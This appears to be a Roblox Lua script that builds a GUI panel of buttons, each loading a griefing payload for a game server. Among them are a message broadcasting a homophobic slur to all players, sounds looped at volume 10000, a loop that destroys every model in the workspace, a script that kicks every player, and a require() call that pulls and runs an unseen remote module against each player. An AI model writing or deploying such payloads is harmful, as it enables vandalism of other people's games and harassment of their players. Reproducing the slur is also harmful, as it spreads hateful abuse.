LMG2L["Message_1a"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Message_1a"]["BorderSizePixel"] = 3;
LMG2L["Message_1a"]["TextSize"] = 12;
LMG2L["Message_1a"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Message_1a"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Message_1a"]["Size"] = UDim2.new(0, 152, 0, 34);
LMG2L["Message_1a"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Message_1a"]["Text"] = [[Message]];
LMG2L["Message_1a"]["Name"] = [[Message]];
LMG2L["Message_1a"]["Position"] = UDim2.new(0, 244, 0, 96);
LMG2L["Message_1a"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local text = "PRAISE TO MANGO GODS YOU FUCKING FAGGOT " 
local duration = 5
local message = Instance.new("Message", game.Workspace)
message.Text = text
wait(duration)
message:Destroy()]]
end)


LMG2L["Bodypartz_1b"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Bodypartz_1b"]["BorderSizePixel"] = 3;
LMG2L["Bodypartz_1b"]["TextSize"] = 15;
LMG2L["Bodypartz_1b"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Bodypartz_1b"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Bodypartz_1b"]["Size"] = UDim2.new(0, 144, 0, 42);
LMG2L["Bodypartz_1b"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Bodypartz_1b"]["Text"] = [[Bodypartz]];
LMG2L["Bodypartz_1b"]["Name"] = [[Bodypartz]];
LMG2L["Bodypartz_1b"]["Position"] = UDim2.new(0, 242, 0, 412);
LMG2L["Bodypartz_1b"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://127653283576622"
    sound.PlaybackSpeed = 1
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)


LMG2L["particles3_1c"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["particles3_1c"]["BorderSizePixel"] = 3;
LMG2L["particles3_1c"]["TextSize"] = 12;
LMG2L["particles3_1c"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["particles3_1c"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["particles3_1c"]["Size"] = UDim2.new(0, 80, 0, 42);
LMG2L["particles3_1c"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["particles3_1c"]["Text"] = [[Particles 3]];
LMG2L["particles3_1c"]["Name"] = [[particles3]];
LMG2L["particles3_1c"]["Position"] = UDim2.new(0, 192, 0, 222);
LMG2L["particles3_1c"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[game.Players.PlayerAdded:Connect(function(player)
    player.CharacterAdded:Connect(function(character)
        local torso = character:FindFirstChild("Torso") or character:FindFirstChild("UpperTorso")
        if torso then
            local pe = Instance.new("ParticleEmitter", torso)
            pe.Texture = "rbxassetid://114658505328936"
            pe.VelocitySpread = 50
            
            local se = Instance.new("ParticleEmitter", torso)
            se.Texture = "rbxassetid://114658505328936"
            se.VelocitySpread = 50
            
            local fe = Instance.new("ParticleEmitter", torso)
            fe.Texture = "rbxassetid://114658505328936"
            fe.VelocitySpread = 50
        end
    end)
end)

for _, player in pairs(game.Players:GetPlayers()) do
    if player.Character then
        local torso = player.Character:FindFirstChild("Torso") or player.Character:FindFirstChild("UpperTorso")
        if torso then
            local pe = Instance.new("ParticleEmitter", torso)
            pe.Texture = "rbxassetid://114658505328936"
            pe.VelocitySpread = 50
            
            local se = Instance.new("ParticleEmitter", torso)
            se.Texture = "rbxassetid://114658505328936"
            se.VelocitySpread = 50
            
            local fe = Instance.new("ParticleEmitter", torso)
            fe.Texture = "rbxassetid://114658505328936"
            fe.VelocitySpread = 50
        end
    end
end]]
end)


LMG2L["Toadroast_1d"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Toadroast_1d"]["BorderSizePixel"] = 3;
LMG2L["Toadroast_1d"]["TextSize"] = 12;
LMG2L["Toadroast_1d"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Toadroast_1d"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Toadroast_1d"]["Size"] = UDim2.new(0, 94, 0, 42);
LMG2L["Toadroast_1d"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Toadroast_1d"]["Text"] = [[Toadroast]];
LMG2L["Toadroast_1d"]["Name"] = [[Toadroast]];
LMG2L["Toadroast_1d"]["Position"] = UDim2.new(0, 298, 0, 274);
LMG2L["Toadroast_1d"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[wait(0)
math.randomseed(tick() % 1 * 1e6)
sky = coroutine.create(function()
	while wait(0.3) do
		s = Instance.new("Sky",game.Lighting)
		s.SkyboxBk,s.SkyboxDn,s.SkyboxFt,s.SkyboxLf,s.SkyboxRt,s.SkyboxUp = "rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408","rbxassetid://201208408"
		s.CelestialBodiesShown = false
	end
end)
 
 
del = coroutine.create(function()
	while wait(0.3) do
		for i,v in pairs(workspace:GetChildren()) do
			if v:IsA("Model") then
				v:Destroy()
			end
		end
	end
end)
 
 
 
for i,v in pairs(game.Players:GetChildren()) do
end
 
noises = {'rbxassetid://230287740','rbxassetid://271787597','rbxassetid://153752123','rbxassetid://271787503'}
 
sound = coroutine.create(function()
	a = Instance.new("Sound",workspace)
	a.SoundId = "rbxassetid://141509625"
	a.Name = "RAINING MEN"
	a.Volume = 0
	a.Looped = true
	a:Play()
	while wait(0.2) do
		rainin = workspace:FindFirstChild("RAINING MEN")
		if not rainin then
			a = Instance.new("Sound",workspace)
			a.SoundId = "rbxassetid://9007859985"
			a.Name = "RAINING MEN"
			a.Volume = 0
			a.Looped = true
			a:Play()
		end
	end
end)
 
msg = coroutine.create(function()
	while wait(0.4) do
		msg = Instance.new("Message",workspace)
		msg.Text = "GET TOADROASTED BY MANGOTROLLFACEEDIT"
	wait(0.4)
		msg:Destroy()
	end
end)
 
 
rain = coroutine.create(function()
	while wait(10 % 1 * 1e2) do
		part = Instance.new("Part",workspace)
		part.Name = "Meshes/toad (3)"
 
		mesh = Instance.new("SpecialMesh",part)
 
		sound = Instance.new("Sound",workspace)
 
		part.CanCollide = false
		part.Size = Vector3.new(440,530,380)
		part.Position = Vector3.new(math.random(-3000,1000),math.random(1,3000),math.random(-3000,3000))
 
		sound.SoundId = noises[math.random(1,#noises)]
		sound.Volume = 0
		sound:Play()
		sound.Ended:connect(function()
			sound:Destroy()
		end)
 
 
		mesh.MeshType = "FileMesh"
		mesh.MeshId = "rbxassetid://7234998844"
		mesh.TextureId = "rbxassetid://1009824086"
	end
end)
coroutine.resume(sky)
coroutine.resume(del)
coroutine.resume(sound)
coroutine.resume(msg)
coroutine.resume(rain)
 
local sound = Instance.new("Sound")
 
sound.Name = "Sound"
sound.SoundId = "http://www.roblox.com/asset/?id=104497567166761" 
sound.Volume = .9999999999999999999999999999999999999999999999999999999999999999999 
sound.Pitch = 0.25 
sound.Looped = true
sound.archivable = false
 
sound.Parent = game.Workspace
 
wait(0)
 
sound:play()

local h = Instance.new("Hint")
h.Parent = Workspace 
h.Text = "HALLELUYA"
wait(9999999999999)
h:Remove()]]
end)

LMG2L["particles_1e"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["particles_1e"]["BorderSizePixel"] = 3;
LMG2L["particles_1e"]["TextSize"] = 12;
LMG2L["particles_1e"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["particles_1e"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["particles_1e"]["Size"] = UDim2.new(0, 78, 0, 42);
LMG2L["particles_1e"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["particles_1e"]["Text"] = [[Particles]];
LMG2L["particles_1e"]["Name"] = [[particles]];
LMG2L["particles_1e"]["Position"] = UDim2.new(0, 8, 0, 222);
LMG2L["particles_1e"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[game.Players.PlayerAdded:Connect(function(player)
    player.CharacterAdded:Connect(function(character)
        local torso = character:FindFirstChild("Torso") or character:FindFirstChild("UpperTorso")
        if torso then
            local pe = Instance.new("ParticleEmitter", torso)
            pe.Texture = "rbxassetid://75055067322540"
            pe.VelocitySpread = 50
            
            local se = Instance.new("ParticleEmitter", torso)
            se.Texture = "rbxassetid://75055067322540"
            se.VelocitySpread = 50
            
            local fe = Instance.new("ParticleEmitter", torso)
            fe.Texture = "rbxassetid://75055067322540"
            fe.VelocitySpread = 50
        end
    end)
end)

for _, player in pairs(game.Players:GetPlayers()) do
    if player.Character then
        local torso = player.Character:FindFirstChild("Torso") or player.Character:FindFirstChild("UpperTorso")
        if torso then
            local pe = Instance.new("ParticleEmitter", torso)
            pe.Texture = "rbxassetid://75055067322540"
            pe.VelocitySpread = 50
            
            local se = Instance.new("ParticleEmitter", torso)
            se.Texture = "rbxassetid://75055067322540"
            se.VelocitySpread = 50
            
            local fe = Instance.new("ParticleEmitter", torso)
            fe.Texture = "rbxassetid://75055067322540"
            fe.VelocitySpread = 50
        end
    end
end]]
end)


LMG2L["Shutdown_1f"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Shutdown_1f"]["BorderSizePixel"] = 3;
LMG2L["Shutdown_1f"]["TextSize"] = 15;
LMG2L["Shutdown_1f"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Shutdown_1f"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Shutdown_1f"]["Size"] = UDim2.new(0, 118, 0, 42);
LMG2L["Shutdown_1f"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Shutdown_1f"]["Text"] = [[Shutdown]];
LMG2L["Shutdown_1f"]["Name"] = [[Shutdown]];
LMG2L["Shutdown_1f"]["Position"] = UDim2.new(0, 15, 0, 326);
LMG2L["UIDragDetector_1f"] = Instance.new("UIDragDetector", LMG2L["Frame_2"]);
LMG2L["Shutdown_1f"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[for _,plr in ipairs(game.Players:GetPlayers()) do

	pcall(function()

		plr:Kick("TS PLACE IS FUCKED UP LOL")

	end)

end
]]
end)


LMG2L["Rainingmen_20"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Rainingmen_20"]["BorderSizePixel"] = 3;
LMG2L["Rainingmen_20"]["TextSize"] = 15;
LMG2L["Rainingmen_20"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Rainingmen_20"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Rainingmen_20"]["Size"] = UDim2.new(0, 118, 0, 42);
LMG2L["Rainingmen_20"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Rainingmen_20"]["Text"] = [[Raining men]];
LMG2L["Rainingmen_20"]["Name"] = [[Rainingmen]];
LMG2L["Rainingmen_20"]["Position"] = UDim2.new(0, 272, 0, 532);
LMG2L["Rainingmen_20"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://104497567166761"
    sound.PlaybackSpeed = 0.25
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)

LMG2L["Cartel_21"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Cartel_21"]["BorderSizePixel"] = 3;
LMG2L["Cartel_21"]["TextSize"] = 15;
LMG2L["Cartel_21"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Cartel_21"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Cartel_21"]["Size"] = UDim2.new(0, 118, 0, 42);
LMG2L["Cartel_21"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Cartel_21"]["Text"] = [[Cartel music]];
LMG2L["Cartel_21"]["Name"] = [[Cartel]];
LMG2L["Cartel_21"]["Position"] = UDim2.new(0, 12, 0, 532);
LMG2L["Cartel_21"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[local sound = Instance.new("Sound")
    sound.SoundId = "rbxassetid://75865270673378"
    sound.PlaybackSpeed = 0.15
    sound.Parent = workspace
    sound.Looped = true
    sound.Volume = 10000
    sound:Play()]]
end)

LMG2L["Obunga_22"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["Obunga_22"]["BorderSizePixel"] = 3;
LMG2L["Obunga_22"]["TextSize"] = 10;
LMG2L["Obunga_22"]["TextColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Obunga_22"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Obunga_22"]["Size"] = UDim2.new(0, 126, 0, 42);
LMG2L["Obunga_22"]["BorderColor3"] = Color3.fromRGB(226, 226, 226);
LMG2L["Obunga_22"]["Text"] = [[Obunga jumpscare]];
LMG2L["Obunga_22"]["Name"] = [[Obunga]];
LMG2L["Obunga_22"]["Position"] = UDim2.new(0, 140, 0, 326);
LMG2L["Obunga_22"].MouseButton1Click:Connect(function()
LMG2L["TextBox_d"].Text = [[for i,v in pairs(game.Players:GetPlayers()) do require(94540928447702).s(v.Name) end]]
end)



return LMG2L["ScreenGui_1"], require;
